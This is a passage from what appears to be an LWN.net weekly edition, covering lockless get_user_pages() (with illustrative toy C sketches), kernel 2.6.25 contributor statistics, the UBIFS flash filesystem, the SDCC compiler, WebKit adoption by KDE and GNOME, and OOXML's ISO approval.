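#define _GNU_SOURCE             /* O_DIRECT is a Linux extension */
#include <fcntl.h>
#include <stdint.h>
#include <stdlib.h>
#include <unistd.h>

#ifndef O_DIRECT
#define O_DIRECT 0              /* not exposed here: degrade to buffered I/O */
#endif

#define DIO_ALIGN 4096          /* assumed buffer/offset alignment */

/* Allocate a buffer suitably aligned for direct I/O; NULL on failure. */
void *dio_alloc(size_t len)
{
    void *buf = NULL;

    if (posix_memalign(&buf, DIO_ALIGN, len) != 0)
        return NULL;
    return buf;
}

/* Read len bytes at offset, bypassing the page cache.  buf, len and
 * offset should all be multiples of DIO_ALIGN.  Returns bytes read or -1. */
ssize_t dio_read(const char *path, void *buf, size_t len, off_t offset)
{
    ssize_t n;
    int fd = open(path, O_RDONLY | O_DIRECT);

    if (fd < 0)
        return -1;
    n = pread(fd, buf, len, offset);
    close(fd);
    return n;
}
```

The buffer passed to pread() here is exactly the kind of user-space memory
the kernel has to pin before it can start the transfer.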


When the kernel is asked to carry out a direct I/O operation, one of the
first things it must do is to pin all of the relevant user-space pages into
memory and locate their physical addresses.  The function which performs
this task is get_user_pages():
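
In kernels of this era the prototype looked approximately like the
following.  It is reproduced from memory of the 2.6.25 source rather than
from the patch posting, so treat the exact parameter types as an
assumption; the forward declarations are only there so that the fragment
stands alone.

```c
/* Opaque kernel types, declared only so the prototype is self-contained. */
struct task_struct;
struct mm_struct;
struct page;
struct vm_area_struct;

int get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
                   unsigned long start, int len, int write, int force,
                   struct page **pages, struct vm_area_struct **vmas);
```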


A successful call to get_user_pages() will pin len pages
into memory, those pages starting at the user-space address start
as seen in the given mm.  The addresses of the relevant struct
page pointers will be stored in pages, and the associated VMA
pointers in vmas if it is not NULL.  


This function works, but it has a problem (beyond the fact that it is a
long, twisted, complex mess to read): it requires that the caller hold
mm->mmap_sem.  If two processes are performing direct I/O
within the same address space - a common scenario for large database
management systems - they will contend for that semaphore.  This kind of
lock contention quickly kills scalability; as soon as processors have to
wait for each other, there is little to be gained by adding more of them. 


There are two common approaches to take when faced with this sort of
scalability problem.  One is to go with more fine-grained locking, where each
lock covers a smaller part of the kernel.  Splitting up locks has been
happening since the initial creation of the Big Kernel Lock, which is the
definitive example of coarse-grained locking.  There are limits to how much
fine-grained locking can help, though, and the addition of more locks comes
at the cost of more complexity and more opportunities to create deadlocks.


The other approach is to do away with locking altogether; this has been the
preferred way of improving scalability in recent years.  That is, for
example, what all of the work around read-copy-update has been doing.  And
this is the direction Nick has chosen to improve get_user_pages().


Nick's core observation is that, when get_user_pages() is called
on a normal user-space page which is already present in memory, that page's
reference count can be increased without needing to hold any locks first.
As it happens, this is the most common use case.  Behind that observation,
though, are a few conditions.  One is that it is not possible to traverse
the page tables if those tables are being modified at the same time.  To be
guaranteed that this will not happen, the kernel must, before heading into
the page table tree, disable interrupts in the current processor.  Even
then, the kernel can only traverse the currently-running process's page
tables without holding mmap_sem.


Lockless operation also will not work whenever pages which are not "normal"
are involved.  Some cases - non-present pages, for example - are easily
detected from the information found in the page tables themselves.  But
others, such as situations where the relevant part of the address space has
been mapped onto device memory with mmap(), are not readily
apparent by looking at the associated page table entries.  In this case,
the kernel must look back at the controlling vm_area_struct (VMA)
structure to see what is going on - and that cannot be done without holding
mmap_sem.  So it looks like there is no way to find out whether
lockless operation is possible without first taking the lock.


The solution here is to grab a free bit in the page table entry.  The PTE
for a page which is present in memory holds the physical page frame
address.  In such addresses, the bottom 12 bits (for architectures using
4096-byte pages) will always be zero, so they can be dedicated to other
purposes.  One of them is used to indicate whether the page is present in
memory at all; others indicate writability, whether it's a user-space page,
whether it is dirty, etc.  Nick's patch grabs one of the few remaining bits
and calls it "PAGE_BIT_SPECIAL," indicating "special" pages.
These are pages which, for whatever reason, do not have a
readily-accessible struct page associated with them.  Marking
"special" pages in the page tables can help in a number of places; one of
those is making it possible to determine whether lockless
get_user_pages() is possible on a given page.
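
The bit-packing described above can be sketched in a few lines of
user-space C.  The macro names and the specific bit positions are
illustrative assumptions loosely modeled on x86; they are not the kernel's
definitions, and the sketch ignores any flag bits stored above the frame
address.

```c
#include <stdint.h>

#define TOY_PAGE_SHIFT 12                                    /* 4096-byte pages */
#define TOY_FLAGS_MASK ((UINT64_C(1) << TOY_PAGE_SHIFT) - 1) /* low 12 bits */

/* Hypothetical flag positions within the low 12 bits. */
#define TOY_PTE_PRESENT (UINT64_C(1) << 0)
#define TOY_PTE_WRITE   (UINT64_C(1) << 1)
#define TOY_PTE_USER    (UINT64_C(1) << 2)
#define TOY_PTE_DIRTY   (UINT64_C(1) << 6)
#define TOY_PTE_SPECIAL (UINT64_C(1) << 9)   /* one of the spare bits */

/* Combine a page-aligned frame address with flag bits. */
uint64_t toy_pte_make(uint64_t frame_addr, uint64_t flags)
{
    return (frame_addr & ~TOY_FLAGS_MASK) | (flags & TOY_FLAGS_MASK);
}

/* Recover the physical frame address from a PTE. */
uint64_t toy_pte_frame(uint64_t pte)
{
    return pte & ~TOY_FLAGS_MASK;
}

/* Can this page be pinned without consulting the VMA?  It must be
 * present, a user page, writable if a write is intended, and not special. */
int toy_pte_lockless_ok(uint64_t pte, int write)
{
    uint64_t need = TOY_PTE_PRESENT | TOY_PTE_USER;

    if (write)
        need |= TOY_PTE_WRITE;
    return (pte & need) == need && !(pte & TOY_PTE_SPECIAL);
}
```

The point of the extra bit is visible in the last function: everything
needed for the decision is in the PTE itself, so no lock has to be taken
just to find out whether the lock can be skipped.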


Once these pages are properly marked in the page tables, it is possible
to write a function which makes a good attempt at a lockless
get_user_pages().  Nick's proposal is called
fast_gup():
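
As best your editor can reconstruct it, the proposed prototype was along
these lines; it matches the get_user_pages_fast() interface that was later
merged, but the exact form in the original posting should be treated as an
assumption.

```c
struct page;    /* opaque kernel type, declared so the fragment stands alone */

int fast_gup(unsigned long start, int nr_pages, int write,
             struct page **pages);
```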


This function has a much simpler interface than get_user_pages()
because it does not handle many of the cases that get_user_pages()
can deal with.  It only works with the current process's address space, and
it cannot return pointers to VMA structures.  But it can iterate
through a set of page tables, testing each page for presence, writability,
and "non-specialness," and incrementing each page's reference count (thus
pinning it into physical memory) in the process.  If it works, it's very
fast.  If not, it undoes things then falls back to
get_user_pages() to do things the slow, old-fashioned way. 
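
The try-fast, undo, fall-back pattern can be modeled in user space.
Everything below is a toy: the structures, flag names, and the behavior of
the "slow" path (which simply pretends to fault pages in) are assumptions
made for illustration and bear no relation to the real page table code.

```c
enum { T_PRESENT = 1, T_WRITE = 2, T_SPECIAL = 4 };

struct toy_page { int refcount; };
struct toy_pte  { struct toy_page *page; unsigned flags; };

int toy_slow_calls;     /* how many times the locked fallback ran */

/* Lockless attempt: pin every page, or undo and report 0 pinned. */
int toy_fast_gup(struct toy_pte *ptes, int nr, int write,
                 struct toy_page **pages)
{
    int i;

    for (i = 0; i < nr; i++) {
        unsigned f = ptes[i].flags;

        if (!(f & T_PRESENT) || (f & T_SPECIAL) || (write && !(f & T_WRITE)))
            break;
        ptes[i].page->refcount++;       /* pin the page */
        pages[i] = ptes[i].page;
    }
    if (i == nr)
        return nr;
    while (i-- > 0)                     /* undo the partial work */
        ptes[i].page->refcount--;
    return 0;
}

/* Stand-in for get_user_pages() under mmap_sem: "faults in" pages as
 * needed and refuses special ones. */
int toy_slow_gup(struct toy_pte *ptes, int nr, int write,
                 struct toy_page **pages)
{
    int i;

    toy_slow_calls++;
    for (i = 0; i < nr; i++) {
        if (ptes[i].flags & T_SPECIAL) {
            while (i-- > 0)
                ptes[i].page->refcount--;
            return -1;
        }
        ptes[i].flags |= T_PRESENT | (write ? T_WRITE : 0);
        ptes[i].page->refcount++;
        pages[i] = ptes[i].page;
    }
    return nr;
}

/* What a caller would use: fast path first, slow path if it bails out. */
int toy_pin_pages(struct toy_pte *ptes, int nr, int write,
                  struct toy_page **pages)
{
    int got = toy_fast_gup(ptes, nr, write, pages);

    if (got == nr)
        return got;
    return toy_slow_gup(ptes, nr, write, pages);
}
```

In the common case, where every page is already resident, the fallback is
never reached and no lock is touched.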
 

How much is this worth?  Nick claims a 10% performance improvement running
"an OLTP workload" (one of those unnameable benchmark suites, perhaps) using
IBM's DB2 DBMS system on a two-processor (eight-core) system.  The
performance improvement, he says, may be greater on larger systems.  But
even if it remains at "only" 10%, this work is a clear step in the right
direction for this kind of workload.


[Update: this interface was merged for the 2.6.27 kernel; the name
was changed to get_user_pages_fast() but it is otherwise the
same.]

		Where 2.6.25 came from


The Linux Foundation has just published a
white paper, written by Greg Kroah-Hartman, Amanda McPherson, and your
editor, reviewing the origins of the code merged into the kernel from
2.6.11 through 2.6.24.  As LWN readers know, the 2.6.25 kernel is
getting close to release.  So this seems like as good a time as any to look
at what happened with the process in this release cycle.

As of this writing, 12,269 individual changesets have been merged for
2.6.25 - a new record.  That beats the previous record (2.6.24, with a mere
10,353 changesets) by almost 2,000.  There were 1,174 individual developers
involved with 2.6.25, 419 of whom contributed one single patch.  All told,
those developers worked for 159 employers (that your editor could
identify).  The changes added 766,979 lines of code and removed 399,791, for
a total growth of 367,188 lines.

Here is an updated version of a plot that your editor has been fond of
showing during talks in recent years:


This plot shows a cumulative count of lines changed over time, with kernel
release dates added in.  The effects of the merge window policy can be seen
in the stair-step appearance of the plot.  The steps appear to be getting
bigger, but the time between releases has also increased slightly, so the
overall rate of change remains roughly constant.  It is a high rate, with
over five million lines changed - well over half the total - in the last
two years.

So who did this work?  Here is the traditional table of the most active
developers in the 2.6.25 series:


There are some familiar names on this list, but also some new ones.
Bartlomiej Zolnierkiewicz contributed more changesets than any other
developer; his work is contained entirely within the IDE subsystem.
Patrick McHardy works in the networking area, mostly (but not exclusively)
with the netfilter subsystem.  Adrian Bunk continues to make small fixes
all over the tree and to relentlessly hunt down unused code for removal.
Ingo Molnar remains busy in his new role as one of the x86 maintainers;
scheduler work also accounts for a number of his changes.  Paul Mundt
maintains the SuperH architecture.

The picture is a little different when one considers how many lines of code
were changed.  Jesper Nilsson's work was done within the CRIS
architecture.  David Howells works all over the tree; his largest
contribution was the addition of the MN10300 architecture code.  Eliezer
Tamir contributed the bnx2x (Broadcom Everest) network driver, and Kumar
Gala works with the PowerPC architecture.


There is relatively little change in the lists of employers associated with
all of this work (please remember that the numbers associated with
employers are necessarily approximate):


As usual, one can also look at who applies a Signed-off-by header to code
for which they are not the author.  These headers illustrate the chain of
trust which gets code into the kernel.  For 2.6.25, the top approvers of
patches are:


Some of these developers are quite busy; Andrew Morton is signing off
more than twenty patches every day - weekends included.  The gatekeepers to
the kernel continue to work for a relatively small number of companies,
with the top ten employers accounting for over 75% of all non-author
signoffs. 

All told, these numbers paint a picture of a development process which
is healthy and continues to set a fast pace.  It incorporates work from an
increasingly large community of developers who are able to work in a highly
cooperative manner despite the fact that their employers are fierce
competitors.  There are very few projects like it.

(Thanks to Greg Kroah-Hartman for his help in the creation of these
statistics).

		UBIFS


The steady growth in flash-based memory devices looks set to transform
parts of the storage industry.  Flash has a number of advantages over
rotating magnetic storage: it is smaller, has no moving parts, requires
less power, makes less noise, is truly random access, and it has the
potential to be faster. 
But flash is not without its own idiosyncrasies.  Flash-based devices
operate on much larger blocks of data: 32KB or more.  Rewriting a portion
of a block requires running an erase cycle on the entire block (which can
be quite slow) and writing the entire block's contents.  There is a limit
to the number of times a block can be erased before it begins to corrupt
the data stored there; that limit is low enough that it can bring a
premature end to a flash-based device's life, especially if the same block
is repeatedly rewritten.  And so on.
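
The cost of a small rewrite can be illustrated with a toy model of one
erase block.  The structure and function below are hypothetical, and the
32KB size is simply the figure mentioned above; real devices differ.

```c
#include <stddef.h>
#include <string.h>

#define TOY_ERASE_BLOCK_SIZE (32 * 1024)

struct toy_flash_block {
    unsigned char data[TOY_ERASE_BLOCK_SIZE];
    unsigned erase_count;       /* wear accumulated by this block */
};

/* Change len bytes at offset off.  Even a tiny change costs a full
 * read, erase, and rewrite of the block.  Returns 0, or -1 if the
 * range does not fit in the block. */
int toy_flash_rewrite(struct toy_flash_block *blk, size_t off,
                      const void *src, size_t len)
{
    static unsigned char shadow[TOY_ERASE_BLOCK_SIZE];

    if (off > TOY_ERASE_BLOCK_SIZE || len > TOY_ERASE_BLOCK_SIZE - off)
        return -1;
    memcpy(shadow, blk->data, TOY_ERASE_BLOCK_SIZE);   /* read whole block */
    memcpy(shadow + off, src, len);                    /* modify in RAM */
    memset(blk->data, 0xFF, TOY_ERASE_BLOCK_SIZE);     /* erase cycle */
    blk->erase_count++;
    memcpy(blk->data, shadow, TOY_ERASE_BLOCK_SIZE);   /* write it all back */
    return 0;
}
```

Three bytes changed, one erase cycle spent: this is why repeatedly
rewriting the same block wears it out so quickly.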


A number of approaches exist for making flash-based devices work well.
Many devices, such as USB drives, include a software "flash translation
layer" (FTL); this layer performs the necessary impedance matching to make
a flash device look like an ordinary block device with small sectors.
Internally, the FTL maintains a mapping between logical blocks and physical
erase blocks which allows it to perform wear leveling - distributing
rewrite operations across the device so that no specific erase block wears
out before its time - though some observers question whether low-end flash
devices bother to do that.  The use of an FTL makes life easy for the rest of
the system, but it is not necessarily the way to get the best performance
out of the hardware.


If you can get to the device directly, without an FTL getting in the way,
it is possible to create filesystems which embody an awareness of how flash
works.  Most of our contemporary filesystems are designed around rotating
storage, with the result that they work hard to minimize time-consuming
operations like head seeks.  A flash-based filesystem need not worry about
such issues, but it must be concerned about things like erase blocks
instead.  So making the best use of flash requires a filesystem written
with flash in mind.


The main filesystem for flash-based devices on Linux is the venerable
JFFS2.  This filesystem works, but it was designed for devices which are
rather smaller than those available today.  Since JFFS2 must do things like
rebuild the entire directory tree at mount time, it can be quite slow on
large devices - for relatively small values of "large" by 2008 standards.
JFFS2 is widely seen as reaching the end of its time.


A more contemporary alternative is LogFS, which has been discussed on these pages in the
past.  This work remains unfinished, though, and development has been
relatively slow in recent times; LogFS has not yet been seriously
considered for merging into the mainline.  A more recent contender is UBIFS; this code is in a state
of relative completion and its developers are asking for serious review.


UBIFS depends on the UBI layer, which was merged for 2.6.22.  UBI
("unsorted block images") is not, technically, an FTL, but it performs a
number of the same functions.  At the heart of UBI is a translation table
which maps logical erase blocks (LEBs) onto physical erase blocks (PEBs).
So software using UBI to access flash sees a device providing a simple set
of sequential blocks which apparently do not move.  In fact, when an LEB is
rewritten, the new data will be placed into a different location on the
physical device, but the upper layers know nothing about it.  So UBI makes
problems like wear leveling and bad block avoidance go away for the upper
layers.  UBI also takes care of running time-consuming erase operations in
the background when possible so that upper layers need not wait when
writing a block.
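
A toy version of the translation table shows the idea.  The sizes, names,
and the "pick the least-erased free block" policy are assumptions for
illustration; the real UBI code is considerably more involved and performs
the erase in the background rather than inline.

```c
#define TOY_NPEB 8              /* physical erase blocks */
#define TOY_NLEB 4              /* logical erase blocks */
#define TOY_UNMAPPED (-1)

struct toy_ubi {
    int leb_to_peb[TOY_NLEB];           /* the translation table */
    int peb_busy[TOY_NPEB];
    unsigned erase_count[TOY_NPEB];
};

void toy_ubi_init(struct toy_ubi *u)
{
    int i;

    for (i = 0; i < TOY_NLEB; i++)
        u->leb_to_peb[i] = TOY_UNMAPPED;
    for (i = 0; i < TOY_NPEB; i++) {
        u->peb_busy[i] = 0;
        u->erase_count[i] = 0;
    }
}

/* Rewrite a logical block: the data lands in the least-worn free PEB,
 * the table is updated, and the old PEB is erased and freed.
 * Returns the new PEB number, or -1 on error. */
int toy_ubi_write_leb(struct toy_ubi *u, int leb)
{
    int i, best = -1, old;

    if (leb < 0 || leb >= TOY_NLEB)
        return -1;
    for (i = 0; i < TOY_NPEB; i++)
        if (!u->peb_busy[i] &&
            (best < 0 || u->erase_count[i] < u->erase_count[best]))
            best = i;
    if (best < 0)
        return -1;
    old = u->leb_to_peb[leb];
    u->peb_busy[best] = 1;
    u->leb_to_peb[leb] = best;
    if (old != TOY_UNMAPPED) {
        u->erase_count[old]++;          /* erase the stale copy */
        u->peb_busy[old] = 0;
    }
    return best;
}
```

The caller only ever names the logical block; repeated writes to it wander
across the physical device on their own.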


One little problem with UBI is that the logical-to-physical mapping
information is stored in the header of each erase block.  So when the UBI
layer initializes a flash device, it must read the header from every block
to build the mapping table in memory; this operation clearly takes time.
For 1GB flash devices, this initialization overhead is tolerable; in the
future, when we'll be booting our laptops with terabyte-sized flash drives
in them, the linear scan will be a problem.  The UBIFS developers are aware
of this issue, but believe that it can be solved at the UBI level without
affecting the higher-level filesystem code.
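
The initialization cost is easy to see in a sketch.  The header layout
here is hypothetical (one field naming the logical block stored in each
physical block, with each logical block assumed to appear at most once);
the point is only that the loop touches every physical block.

```c
#define TOY_FREE (-1)

/* Hypothetical per-block header: which LEB this PEB holds, or TOY_FREE. */
struct toy_peb_header {
    int leb;
};

/* Build the LEB-to-PEB table by reading every header.  Returns the
 * number of header reads performed, which always equals npeb. */
int toy_ubi_attach(const struct toy_peb_header *hdrs, int npeb,
                   int *leb_to_peb, int nleb)
{
    int peb, leb, reads = 0;

    for (leb = 0; leb < nleb; leb++)
        leb_to_peb[leb] = TOY_FREE;
    for (peb = 0; peb < npeb; peb++) {
        reads++;                        /* one flash read per block */
        leb = hdrs[peb].leb;
        if (leb >= 0 && leb < nleb)
            leb_to_peb[leb] = peb;
    }
    return reads;
}
```

The work grows linearly with the size of the device, regardless of how
much of it is actually in use.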


By using UBI, the UBIFS developers are able to stop worrying about some
aspects of flash-based filesystem design.  Other problems remain, though.
For example, the large erase blocks provided by flash devices require
filesystems to track data at the sub-block level and to perform occasional
garbage collection: coalescing useful information into new blocks so that
the remaining "dead" space can be reclaimed.  Garbage collection, along
with the potential for blocks to turn bad, makes space management on flash
devices tricky: freeing space may require using more space first, and there
is no way to know how much space will actually become available until the
work has been done.


In the case of UBIFS, space management is an even trickier problem for a
couple of reasons.  One is that, like a number of other flash filesystems,
UBIFS performs transparent compression of the data.  The other is that,
unlike JFFS2, UBIFS provides full writeback support, allowing data to be
cached in memory for some time before being written to the physical media.
Writeback gives large performance improvements and reduces wear on the
device, but it can lead to big trouble if the filesystem commits to writing
back more data than it actually has the space to store.  To deal with this
problem, UBIFS includes a complex "budgeting" layer which manages
outstanding writes with pessimistic assumptions on what will be possible.
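
The general shape of pessimistic budgeting can be sketched as follows.
This is not the UBIFS implementation; the structure, the function names,
and the rule "assume the data will not compress at all" are assumptions
chosen to show the idea.

```c
struct toy_budget {
    long free_bytes;        /* space known to be available on the media */
    long reserved_bytes;    /* worst-case space promised to cached writes */
};

/* Called before a write is accepted into the cache.  Reserves the full
 * uncompressed length.  Returns 0 on success, -1 if it might not fit. */
int toy_budget_write(struct toy_budget *b, long uncompressed_len)
{
    if (b->reserved_bytes + uncompressed_len > b->free_bytes)
        return -1;
    b->reserved_bytes += uncompressed_len;
    return 0;
}

/* Called when the data actually reaches the media: drop the worst-case
 * reservation and charge only what was really used. */
void toy_budget_writeback(struct toy_budget *b, long uncompressed_len,
                          long actual_len)
{
    b->reserved_bytes -= uncompressed_len;
    b->free_bytes -= actual_len;
}
```

The filesystem may refuse writes that would in fact have fit, but it never
accepts cached data that it cannot later store.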


Like LogFS, UBIFS uses a "wandering tree" structure to percolate changes up
through the filesystem in an atomic manner.  UBIFS also uses a journal,
though, to minimize the number of rewrites to the upper-level nodes in the
tree. 


The latest UBIFS posting raised questions about how it compares with
LogFS.  The resulting discussion was ... not entirely technical, but a few
clear points came out.  UBIFS is in a more complete state and appears to
perform quite a bit better at this time.  LogFS is a lot less code, avoids
the boot-time linear scan of the device, and is able to work (with some
flash awareness) through an FTL.  Which is better is not a question your
editor is prepared to answer at this time; what does seem clear is that the
growing competition between the two projects has the potential to inspire
big improvements on both sides in the near future.

		SDCC, the Small Device C Compiler


SDCC is a multi-platform, multi-target C cross compiler that was
originally written by Sandeep Dutta and has been further improved by
a number of other people:


SDCC is a retargetable, optimizing ANSI - C compiler that targets the Intel 8051, Maxim 80DS390, Zilog Z80 and the Motorola 68HC08 based MCUs. Work is in progress on supporting the Microchip PIC16 and PIC18 series. SDCC is Free Open Source Software, distributed under GNU General Public License (GPL). Some of the features include:


ASXXXX and ASLINK, a Freeware, retargetable assembler and linker.
 extensive MCU specific language extensions, allowing effective use of the underlying hardware.
 a host of standard optimizations such as global sub expression elimination, loop optimizations (loop invariant, strength reduction of induction variables and loop reversing ), constant folding and propagation, copy propagation, dead code elimination and jump tables for 'switch' statements. 
 MCU specific optimizations, including a global register allocator.
 adaptable MCU specific backend that should be well suited for other 8 bit MCUs
 independent rule based peep hole optimizer.
 a full range of data types: char (8 bits, 1 byte), short (16 bits, 2 bytes), int (16 bits, 2 bytes), long (32 bit, 4 bytes) and float (4 byte IEEE).
 the ability to add inline assembler code anywhere in a function.
 the ability to report on the complexity of a function to help decide what should be re-written in assembler.
 a good selection of automated regression tests.


The SDCC package components include the sdcc compiler, the sdcpp C preprocessor,
assemblers and linkers for the supported target processors,
a simulator for the 8051 processor, the sdcdb source debugger
and the packihx Intel hex file packing tool.


Version 2.8.0 of SDCC was
announced
on March 30, 2008; it includes the following changes:


Your author downloaded SDCC 2.8.0 as a .tar.bz2 file onto a machine running
Ubuntu 7.04 "Feisty Fawn".
The file was uncompressed and untarred.  The configure script
was run and one package dependency issue was resolved by installing
flex.
The second run of configure worked, as did the make
and make install steps.
Running sdcc -v produced the expected result:
SDCC : mcs51/gbz80/z80/avr/ds390/pic16/pic14/TININative/xa51/ds400/hc08 2.8.0 #5117 (Apr  1 2008) (UNIX).


A few test cases were compiled and assembled using the default MCS51 target,
then using the -mz80 switch to produce output for a
Z80 processor.  All of the tests seemed to work, and produced
readable Intel Hex files that appear to be suitable for movement
to a development platform.  Your author recognized
the hex C30001 at the beginning of the code as a Z80 jump instruction
(activate the wayback machine).
While this is a long way from developing a working embedded application
on real hardware using SDCC, it does show that the system builds
and is stable enough to consider using as a development platform.


The Z80
and mcs51
microprocessors have been around since the
late 1970s, and newer versions are still being produced.
The Microchip PIC microcontroller family and the Atmel
AVR
family are currently very popular microcontroller platforms.
The AVR is the processor used in the recently
featured Arduino
open hardware microprocessor design, although that uses a
different development system.


SDCC allows microprocessor applications to be written in C,
and that greatly expands the range of problems that can be
solved by small embedded machines.  The field of C cross-compilers
has traditionally been dominated by proprietary Windows-based
software.  SDCC allows one to develop embedded microprocessor
designs using open-source software under Linux.


		WebKit rising


Once upon a time, there were no usable free web browsers for the Linux
environment; the binary-only Netscape releases were all that was available
to us.
For many, the solution to the problem was to be found in the release of the
Netscape source code; some years later, we got the Mozilla and Firefox
browsers (based on the Gecko rendering engine) from this work.  The KDE
project, though, took a different route in the late 1990s, developing the
KHTML renderer to use with the Konqueror application.


A few years later, Apple surprised the world by selecting KHTML as the base
for its Safari browser, despite the fact that Gecko was more widely
deployed.  What followed was essentially a fork of KHTML and some bad blood
between Apple and the KDE project.  Over time, the two sides have come to a
better understanding, but KHTML and Apple's version (WebKit) have remained separate.  The
existence of two KHTML forks may not last that much longer, though, and
some interesting things appear to be happening.


One of those things is that Konqueror is slowly being moved over to WebKit
as its rendering engine.  The decision to go in this direction was made at
the 2007 Akademy gathering, and work has been proceeding ever since.
Current Ubuntu development releases include a preview version of Konqueror
on WebKit.  Work can be expected to continue in this direction, with the
result that KHTML will slowly lose its prominence in the KDE project.  The
fork, in other words, is beginning to join, with the resulting software
being called "WebKit." [Update: as can be seen in the comments, this
paragraph overstated the case somewhat.  Things might end up as
described here, but that is not the case now.]


Meanwhile, it seems that people are actually starting to use Safari, to the
point that web designers are thinking that they should actually test their
sites with it.  For what it's worth, Safari currently accounts for just
over 3% of visits to LWN.net - relatively small compared to Firefox (over
60%), but, when added to Konqueror's 4.5%, it makes half of Internet
Explorer's 15% share.  One can argue that the mix of browsers used by LWN
readers is not typical of the net as a whole, but, even so, it looks like
WebKit-based browsers just might become a 
significant part of the Internet's software base.


The story does not stop there, though.
When a GNOME project announces, on April 1, that it is moving over to a
major component which came from the KDE camp, one can be forgiven for not
taking it seriously.  But it would appear that this announcement from the Epiphany
developers, saying
that they are moving to WebKit as their sole rendering engine, is the real
thing.  Epiphany, remember, is 
the closest thing that GNOME has to an official web browser; it has users
who swear by its better integration with the GNOME desktop.  But Epiphany
has always been based on the Gecko engine, and it seems that not a whole
lot of users have seen reasons to stick with it over Firefox, which
provides rather more functionality on the same engine.  Epiphany is not a
big force in the browser arena currently.


Last year, the Epiphany developers added an abstraction layer which allowed
the browser to operate over multiple rendering engines, including WebKit.
Now they have decided to take that layer back out and to support just one
rendering engine: WebKit.  The development team cites a number of reasons
for moving away from Gecko, including release-cycle mismatches, a feature
set which is driven by a competing project, and a lack of attention being
paid to the Gecko/GTK embedding API.  Gecko, they have decided, is not the
best fit for Epiphany.


WebKit, instead, was designed for embedding - the WebKit project's goals explicitly
rule out building a browser themselves - and the GNOME
API is said to work very nicely.  WebKit in GNOME uses technologies like
Cairo and Pango, like many other GNOME applications.  Overall, the Epiphany
team feels like WebKit is a better match for what they are trying to do -
and they suggest that a number of other GNOME projects move in that
direction as well.  The initial response from other GNOME participants
appears to be positive, with the exception of some concerns about
accessibility support in WebKit - concerns which, presumably, can be
addressed. 


The GNOME/KDE flame wars, happily, are some years behind us.  Developers
from both projects are more interested in cooperation these days, but, so
far, much of that cooperation has been around relatively small, low-level
components.  An HTML rendering engine is not a small, low-level component,
though.  If both projects seriously work toward the improvement of WebKit,
they will have started an era of rather higher cooperation than has been
seen in the past.  If this cooperation holds together, it can only be to
the benefit of both projects, and to all other users of WebKit as well.


The Gecko engine is good code and a highly successful project.  But it is
also controlled by a company (Mozilla Corporation) whose agenda, beneficial
though it may be, does not include the creation of successful competing
browsers.  So it's not entirely surprising that Gecko has not proved to be
entirely suitable for groups trying to create those competing browsers.
WebKit, at the outset, looks like it is better suited to this task.  The
WebKit project has expressed interest in
working with GNOME; there might just be a productive partnership in the
making here.


But it's worth remembering that WebKit, too, is a project developed by a
company with its own objectives, few of which make any mention of turning
2009 into the real year of the Linux desktop.  For now, though,
WebKit has the look of a project with all the right attributes: real
independence, merit-based access to the source repository, no requirement
for copyright assignments, reasonable licensing, and the right goals.  It
may well be positioned to become a core component in the Linux desktop.

		OOXML gets ISO approval


 The votes are
in, with Microsoft's Office Open XML (OOXML) format gaining
international standard status.  Both Microsoft
and Ecma
International jumped the gun a bit by proclaiming victory a day before
the official announcement, but the writing was on the wall since the
balloting closed on March 29.  There are now two competing standards for
office document formats that have been approved by the International
Organization for Standardization (ISO): OOXML and Open Document Format
(ODF).  

The most recent vote was an opportunity for the national bodies to
change their vote from September based on the outcome of the Ballot
Resolution Meeting (BRM).  The September vote was relatively close but
OOXML did not pass, which led Ecma and Microsoft to try and address the
3,500 comments (1,000+ after eliminating duplicates) made by participating
countries.  The comments and the Microsoft/Ecma solutions to them were
discussed during the five-day BRM in Geneva in
late February. 


When the BRM was announced, many wondered how that number of comments could be handled
in a week-long meeting; unfortunately, the answer is: not very well.  There
was simply too much to cover, so the majority of comments—mostly substantive
issues with OOXML—didn't get discussed and were voted on en
masse.  The majority of participants abstained (18) or failed to vote (4), with six
voting to accept the changes proposed by Microsoft/Ecma and four voting
against.  This allowed the BRM process to complete, leaving it up to the
national bodies to decide whether to change their September votes.


The outcome
was again fairly close, but a net change of seven votes from
"disapprove" to "approve" moved OOXML into approval.  24 of 32 votes from
Participating countries were for approval, which is beyond the
two-thirds majority required.  Also, 86% of the Observing countries voted
to approve, which is above the 75% required.  In both cases, abstentions
are not counted.


At some level, the outcome should not be surprising.  Microsoft put a huge
effort into ensuring OOXML standardization.  Some would claim that they
"gamed" the system—it's pretty clear they did—what's less clear
is why, and what they plan to do next.  Their tactics have been questionable,
which leads many to believe they have an ulterior motive.


To start with, Ecma International essentially rubber-stamped a
"specification" that Microsoft presented as ECMA-376.
Then it was introduced to ISO on the "fast-track" process, which is meant
for mature standards that have few gray areas or controversial parts.
Whatever else can be said of OOXML, nearly anyone who is not firmly in the
Microsoft camp can see that it is in no way mature, clear, or
non-controversial—it is flawed at multiple levels.


One of the most puzzling things about the process is how we have ended up
with two standards.  In general, standards are supposed to be, well,
standard, allowing multiple implementations that use the standard,
but innovate in other areas.  HTML and HTTP are standards, whereas Firefox, Safari,
Konqueror, Opera, and Internet Explorer all implement those
standards—some more faithfully than others—but
provide different sets of features on top.  Microsoft's argument for
multiple standards is a
disingenuous one: choice.


It would seem that Microsoft wants to paint this as a VHS vs. Betamax
battle, where the consumer is able to choose the one best suited for their
needs.  But both of the video recording standards were proprietary, with
many arguing that the technically inferior choice "won".  Microsoft is, of
course, no stranger to having its choices—again arguably technically
inferior and generally pushed through its near-monopoly on the desktop—come out on top.


One might be able to argue that competition between the standards is
consumer-friendly if there is a level playing field.  In order for that to
happen, Microsoft would have to implement and deploy the competitive
standard—something it has clearly said it will not do.  It is hard to
see how customers are going to be able to determine which of the two
formats is "better" when most of them will only be given one choice.


Many also fear that free software (and other non-Microsoft proprietary)
implementations of the standard will not be fully interoperable with the de
facto standard because of specification inadequacies or patents.  Many, including ODF editor Patrick Durusau,
have called for OOXML to be passed so that it can be clarified.  Setting
aside the obvious cart-before-the-horse problem, standards bodies are
notoriously slow (the fast-track approval of OOXML, for example, has
taken more than a year), so expecting that clarifications can be
made through that process is somewhat alarming.  More likely, changes will
be made in the format emitted by various Microsoft products and then
shoehorned into the standard some months or years later.


The claim that billions of documents exist in OOXML, which leads many to
believe it should be adopted, is particularly galling to many.  There is no
OOXML standard yet—the final document has not yet been produced—but
that is a minor issue.  The fact is that even though a form of OOXML is
available in recent Microsoft products, it is not the default and most
documents have not been stored using it.  The billions of documents are
mostly stored in various versions of the proprietary DOC format that non-Microsoft users have
been struggling to read for years.


The opponents of OOXML had their own share of misbehavior during this
process.  It is pretty unlikely that everyone who favored OOXML passage is
in the pay of Microsoft, for example.  The doom and gloom predictions of
